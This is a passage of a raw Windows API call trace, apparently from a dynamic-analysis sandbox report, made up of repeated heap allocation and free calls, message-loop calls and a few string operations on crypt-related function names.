(HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb590 [0274.587] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9040 [0274.587] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338a8 [0274.587] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9040 | out: hHeap=0xcc0000) returned 1 [0274.587] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338a8 | out: hHeap=0xcc0000) returned 1 [0274.587] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb590 | out: hHeap=0xcc0000) returned 1 [0274.587] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb590 [0274.588] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9040 [0274.588] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb548 [0274.588] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338a8 [0274.588] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb548 | out: hHeap=0xcc0000) returned 1 [0274.588] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338a8 | out: hHeap=0xcc0000) returned 1 [0274.588] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9040 | out: hHeap=0xcc0000) returned 1 [0274.588] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9040 [0274.588] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb548 [0274.588] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb560 [0274.589] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338a8 [0274.589] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb560 | out: hHeap=0xcc0000) returned 1 [0274.589] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338a8 | out: hHeap=0xcc0000) returned 1 [0274.589] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb548 | out: hHeap=0xcc0000) returned 1 [0274.589] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb548 [0274.589] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb560 [0274.589] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9010 [0274.589] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338a8 [0274.589] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9010 | out: hHeap=0xcc0000) returned 1 [0274.589] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338a8 | out: hHeap=0xcc0000) returned 1 [0274.589] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb560 | out: hHeap=0xcc0000) returned 1 [0274.589] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb560 [0274.589] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9010 [0274.589] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb518 [0274.589] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338a8 [0274.589] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb518 | out: hHeap=0xcc0000) returned 1 [0274.589] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338a8 | out: hHeap=0xcc0000) returned 1 [0274.589] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9010 | out: hHeap=0xcc0000) returned 1 [0274.589] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33908 | out: hHeap=0xcc0000) returned 1 [0274.589] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338f8 | out: hHeap=0xcc0000) returned 1 [0274.589] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338e8 | out: hHeap=0xcc0000) returned 1 [0274.589] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338d8 | out: hHeap=0xcc0000) returned 1 [0274.589] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338c8 | out: hHeap=0xcc0000) returned 1 [0274.590] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20630 | out: hHeap=0xcc0000) returned 1 [0274.590] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb5c0 | out: hHeap=0xcc0000) returned 1 [0274.590] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33928 | out: hHeap=0xcc0000) returned 1 [0274.590] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed91c0 | out: hHeap=0xcc0000) returned 1 [0274.590] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb6e0 | out: hHeap=0xcc0000) returned 1 [0274.590] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb6c8 | out: hHeap=0xcc0000) returned 1 [0274.590] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb698 | out: hHeap=0xcc0000) returned 1 [0274.590] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9190 | out: hHeap=0xcc0000) returned 1 [0274.590] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9160 | out: hHeap=0xcc0000) returned 1 [0274.590] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb6b0 | out: hHeap=0xcc0000) returned 1 [0274.590] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb668 | out: hHeap=0xcc0000) returned 1 [0274.590] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9130 | out: hHeap=0xcc0000) returned 1 [0274.590] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb680 | out: hHeap=0xcc0000) returned 1 [0274.590] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb638 | out: hHeap=0xcc0000) returned 1 [0274.590] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9100 | out: hHeap=0xcc0000) returned 1 [0274.590] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb650 | out: hHeap=0xcc0000) returned 1 [0274.590] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb608 | out: hHeap=0xcc0000) returned 1 [0274.590] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed90d0 | out: hHeap=0xcc0000) returned 1 [0274.590] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb620 | out: hHeap=0xcc0000) returned 1 [0274.590] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb5d8 | out: hHeap=0xcc0000) returned 1 [0274.590] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed90a0 | out: hHeap=0xcc0000) returned 1 [0274.590] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb5f0 | out: hHeap=0xcc0000) returned 1 [0274.590] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb5a8 | out: hHeap=0xcc0000) returned 1 [0274.590] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee48f0 | out: hHeap=0xcc0000) returned 1 [0274.590] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33938 | out: hHeap=0xcc0000) returned 1 [0274.591] PeekMessageW (in: lpMsg=0x8df654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df654) returned 1 [0274.591] TranslateAcceleratorW (hWnd=0xc0170, hAccTable=0x1b016b, lpMsg=0x8df654) returned 0 [0274.591] IsDialogMessageW (hDlg=0xc0170, lpMsg=0x8df654) returned 1 [0274.594] PeekMessageW (in: lpMsg=0x8df654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df654) returned 0 [0274.594] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33938 [0274.594] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20a) returned 0xd075a8 [0274.594] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33928 [0274.594] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd075a8 | out: hHeap=0xcc0000) returned 1 [0274.594] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33928 | out: hHeap=0xcc0000) returned 1 [0274.594] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33928 [0274.594] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf338c8 [0274.594] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x18) returned 0xf23888 [0274.594] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf338d8 [0274.594] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338d8 | out: hHeap=0xcc0000) returned 1 [0274.594] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338c8 | out: hHeap=0xcc0000) returned 1 [0274.595] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf23888 | out: hHeap=0xcc0000) returned 1 [0274.595] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33928 | out: hHeap=0xcc0000) returned 1 [0274.595] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33938 | out: hHeap=0xcc0000) returned 1 [0274.595] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e80 [0274.595] PeekMessageW (in: lpMsg=0x8df654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df654) returned 0 [0274.595] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33938 [0274.595] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xf51e80 [0274.595] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0274.595] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf51e80 | out: hHeap=0xcc0000) returned 1 [0274.595] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33938 | out: hHeap=0xcc0000) returned 1 [0274.595] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20630 [0274.595] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x1) returned 0xf33938 [0274.595] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20658 [0274.595] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb5a8 [0274.595] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33928 [0274.595] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf338c8 [0274.595] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338c8 | out: hHeap=0xcc0000) returned 1 [0274.595] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33928 | out: hHeap=0xcc0000) returned 1 [0274.595] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xedb5f0 [0274.595] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20680 [0274.595] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed90a0 [0274.595] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33928 [0274.596] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed90a0 | out: hHeap=0xcc0000) returned 1 [0274.596] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf206a8 [0274.596] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed90a0 [0274.596] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xee48f0 [0274.596] PeekMessageW (in: lpMsg=0x8df3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df3fc) returned 0 [0274.596] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf338c8 [0274.596] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338c8 | out: hHeap=0xcc0000) returned 1 [0274.596] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb5d8 [0274.596] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb620 [0274.596] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed90d0 [0274.596] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338c8 [0274.596] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf338d8 [0274.597] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338d8 | out: hHeap=0xcc0000) returned 1 [0274.597] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf338d8 [0274.597] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338d8 | out: hHeap=0xcc0000) returned 1 [0274.597] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed90d0 | out: hHeap=0xcc0000) returned 1 [0274.597] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338c8 | out: hHeap=0xcc0000) returned 1 [0274.597] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb620 | out: hHeap=0xcc0000) returned 1 [0274.597] PeekMessageW (in: lpMsg=0x8df3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df3fc) returned 0 [0274.597] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee48f0 | out: hHeap=0xcc0000) returned 1 [0274.597] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed90a0 | out: hHeap=0xcc0000) returned 1 [0274.597] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf206a8 | out: hHeap=0xcc0000) returned 1 [0274.597] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33928 | out: hHeap=0xcc0000) returned 1 [0274.597] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20680 | out: hHeap=0xcc0000) returned 1 [0274.597] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb5f0 | out: hHeap=0xcc0000) returned 1 [0274.597] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33938 | out: hHeap=0xcc0000) returned 1 [0274.597] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20630 | out: hHeap=0xcc0000) returned 1 [0274.597] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb5a8 | out: hHeap=0xcc0000) returned 1 [0274.597] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20658 | out: hHeap=0xcc0000) returned 1 [0274.597] PeekMessageW (in: lpMsg=0x8df654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df654) returned 0 [0274.597] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e80 | out: hHeap=0xcc0000) returned 1 [0274.597] PeekMessageW (in: lpMsg=0x8df654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df654) returned 0 [0274.597] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e40 | out: hHeap=0xcc0000) returned 1 [0274.597] PeekMessageW (in: lpMsg=0x8df654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df654) returned 0 [0274.597] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33938 [0274.597] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xf51e80 [0274.597] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0274.598] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf51e80 | out: hHeap=0xcc0000) returned 1 [0274.598] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33938 | out: hHeap=0xcc0000) returned 1 [0274.598] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xedb5a8 [0274.598] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xee48f0 [0274.598] PeekMessageW (in: lpMsg=0x8df3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df3fc) returned 0 [0274.598] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33938 [0274.598] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33938 | out: hHeap=0xcc0000) returned 1 [0274.598] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33938 [0274.598] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33938 | out: hHeap=0xcc0000) returned 1 [0274.598] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33938 [0274.599] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33938 | out: hHeap=0xcc0000) returned 1 [0274.599] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb7a0 | out: hHeap=0xcc0000) returned 1 [0274.599] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33968 | out: hHeap=0xcc0000) returned 1 [0274.599] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb788 | out: hHeap=0xcc0000) returned 1 [0274.599] PeekMessageW (in: lpMsg=0x8df3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df3fc) returned 0 [0274.599] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee48f0 | out: hHeap=0xcc0000) returned 1 [0274.599] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb5a8 | out: hHeap=0xcc0000) returned 1 [0274.599] PeekMessageW (in: lpMsg=0x8df654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df654) returned 0 [0274.599] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33968 [0274.599] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33968 | out: hHeap=0xcc0000) returned 1 [0274.599] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee48a8 | out: hHeap=0xcc0000) returned 1 [0274.599] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb7d0 | out: hHeap=0xcc0000) returned 1 [0274.599] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20590 | out: hHeap=0xcc0000) returned 1 [0274.599] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33978 | out: hHeap=0xcc0000) returned 1 [0274.599] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf205e0 | out: hHeap=0xcc0000) returned 1 [0274.599] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9250 | out: hHeap=0xcc0000) returned 1 [0274.599] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20568 | out: hHeap=0xcc0000) returned 1 [0274.599] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33988 | out: hHeap=0xcc0000) returned 1 [0274.599] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20540 | out: hHeap=0xcc0000) returned 1 [0274.599] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9070 | out: hHeap=0xcc0000) returned 1 [0274.599] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb578 | out: hHeap=0xcc0000) returned 1 [0274.599] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb590 | out: hHeap=0xcc0000) returned 1 [0274.599] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9040 | out: hHeap=0xcc0000) returned 1 [0274.599] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb548 | out: hHeap=0xcc0000) returned 1 [0274.600] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb560 | out: hHeap=0xcc0000) returned 1 [0274.600] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf23848 | out: hHeap=0xcc0000) returned 1 [0274.600] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd07380 | out: hHeap=0xcc0000) returned 1 [0274.600] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33898 | out: hHeap=0xcc0000) returned 1 [0274.600] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb6f8 | out: hHeap=0xcc0000) returned 1 [0274.600] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed91f0 | out: hHeap=0xcc0000) returned 1 [0274.600] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33948 | out: hHeap=0xcc0000) returned 1 [0274.600] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20608 | out: hHeap=0xcc0000) returned 1 [0274.600] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9490 | out: hHeap=0xcc0000) returned 1 [0274.600] PeekMessageW (in: lpMsg=0x8df8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df8ac) returned 0 [0274.601] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e40 [0274.601] PeekMessageW (in: lpMsg=0x8df8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df8ac) returned 0 [0274.601] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33948 [0274.601] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33898 [0274.601] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x18) returned 0xf23848 [0274.601] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf23848 | out: hHeap=0xcc0000) returned 1 [0274.601] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33898 | out: hHeap=0xcc0000) returned 1 [0274.601] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33948 | out: hHeap=0xcc0000) returned 1 [0274.601] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e80 [0274.601] PeekMessageW (in: lpMsg=0x8df8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df8ac) returned 0 [0274.602] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33948 [0274.602] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33898 [0274.602] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xf51e80 [0274.602] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0274.602] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf51e80 | out: hHeap=0xcc0000) returned 1 [0274.602] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33898 | out: hHeap=0xcc0000) returned 1 [0274.602] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20608 [0274.602] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x1) returned 0xf33898 [0274.602] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20540 [0274.602] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9490 [0274.602] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33988 [0274.602] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed91f0 [0274.602] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33988 | out: hHeap=0xcc0000) returned 1 [0274.602] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x1) returned 0xf33988 [0274.602] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb6f8 [0274.602] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33978 [0274.602] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33978 | out: hHeap=0xcc0000) returned 1 [0274.602] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xedb560 [0274.602] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20568 [0274.602] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb548 [0274.602] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33978 [0274.603] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb548 | out: hHeap=0xcc0000) returned 1 [0274.603] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf205e0 [0274.603] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb548 [0274.603] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9040 [0274.603] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20590 [0274.603] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb590 [0274.603] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33968 [0274.603] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb578 [0274.603] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33938 [0274.603] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33938 | out: hHeap=0xcc0000) returned 1 [0274.603] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20658 [0274.603] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9070 [0274.603] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33938 [0274.603] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9070 | out: hHeap=0xcc0000) returned 1 [0274.603] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20630 [0274.603] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9070 [0274.603] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xee48a8 [0274.603] PeekMessageW (in: lpMsg=0x8df37c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df37c) returned 0 [0274.603] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, 